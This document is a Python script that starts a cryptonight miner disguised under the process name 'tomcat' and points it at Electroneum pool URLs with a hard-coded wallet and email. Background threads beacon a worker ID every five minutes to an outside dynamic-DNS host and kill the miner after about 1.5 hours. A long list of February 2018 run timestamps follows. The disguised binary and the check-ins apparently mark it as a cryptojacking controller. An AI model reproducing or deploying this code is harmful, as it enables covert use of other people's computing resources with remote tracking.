import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:24:04.043116
#2018-02-17 17:12:08.034906
#2018-02-17 19:00:01.513201
#2018-02-17 20:49:06.871061
#2018-02-17 22:37:06.152175
#2018-02-18 00:20:08.710440
#2018-02-18 02:11:05.917391
#2018-02-18 03:59:07.024919
#2018-02-18 05:48:03.161083
#2018-02-18 07:38:04.143010
#2018-02-18 09:25:03.770856
#2018-02-18 11:11:05.196929
#2018-02-18 12:58:02.040840
#2018-02-18 14:44:04.936002
#2018-02-18 16:32:01.308594
#2018-02-18 18:21:07.270889
#2018-02-18 20:06:06.916023
#2018-02-18 21:54:05.218013
#2018-02-18 23:42:06.440126
#2018-02-19 01:28:03.500304
#2018-02-19 03:16:06.609977
#2018-02-19 05:01:07.759429
#2018-02-19 06:45:08.919193
#2018-02-19 08:36:04.221768
#2018-02-19 10:25:07.824926
#2018-02-19 12:13:07.247831
#2018-02-19 14:00:11.963414
#2018-02-19 15:49:02.126894
#2018-02-19 17:36:08.993843
#2018-02-19 19:23:04.165646
#2018-02-19 21:09:07.159223
#2018-02-19 22:57:04.533596
#2018-02-20 00:40:08.710185
#2018-02-20 02:29:05.408462
#2018-02-20 04:19:07.466437
#2018-02-20 06:03:07.162573
#2018-02-20 07:48:06.276682
#2018-02-20 09:34:06.058760
#2018-02-20 11:18:05.101723
#2018-02-20 13:05:06.721146
#2018-02-20 14:50:06.197054
#2018-02-20 16:36:10.289331
#2018-02-20 18:23:05.958563
#2018-02-20 20:13:05.706551
#2018-02-20 22:01:04.219074
#2018-02-20 23:42:07.952835
#2018-02-21 01:26:04.654591
#2018-02-21 03:12:07.557354
#2018-02-21 05:00:01.431948
#2018-02-21 06:47:07.035583
#2018-02-21 08:34:08.091356
#2018-02-21 10:20:05.917927
#2018-02-21 12:07:07.728076
#2018-02-21 13:55:08.844695
#2018-02-21 15:39:01.831070
#2018-02-21 17:29:10.281069
#2018-02-21 19:17:23.166219
#2018-02-21 21:05:09.102829
#2018-02-21 22:52:06.218925
#2018-02-22 00:39:05.241822
#2018-02-22 02:26:06.297707
#2018-02-22 04:13:05.524424
#2018-02-22 05:58:01.499537
#2018-02-22 07:44:08.163294
#2018-02-22 09:33:05.806921
#2018-02-22 11:19:01.275065
#2018-02-22 13:05:03.608190
#2018-02-22 14:53:01.342612
#2018-02-22 16:39:01.291845
#2018-02-22 18:24:08.939098
#2018-02-22 20:16:08.305920
#2018-02-22 22:03:07.981643
#2018-02-22 23:51:08.343415
#2018-02-23 01:40:08.949147
#2018-02-23 03:27:07.097667
#2018-02-23 05:12:05.565634
#2018-02-23 06:56:06.462733
#2018-02-23 08:45:07.555142
#2018-02-23 11:03:04.546582
#2018-02-23 12:57:07.874286
#2018-02-23 14:43:08.632520
#2018-02-23 16:33:03.658717
#2018-02-23 18:20:10.380066
#2018-02-23 20:06:06.099928
#2018-02-23 21:51:04.565175
#2018-02-23 23:37:01.453001
#2018-02-24 01:25:07.616667
#2018-02-24 03:17:01.653218
#2018-02-24 05:02:02.040002
#2018-02-24 06:52:03.669991
#2018-02-24 08:42:04.198150
#2018-02-24 10:26:07.448571
#2018-02-24 12:21:03.900617
#2018-02-24 14:12:06.173335
#2018-02-24 15:59:08.159102
#2018-02-24 17:53:04.090662
#2018-02-24 19:40:07.282741
#2018-02-24 21:27:06.789895
#2018-02-25 00:11:04.900420
#2018-02-25 04:07:01.581014
#2018-02-25 07:38:07.389480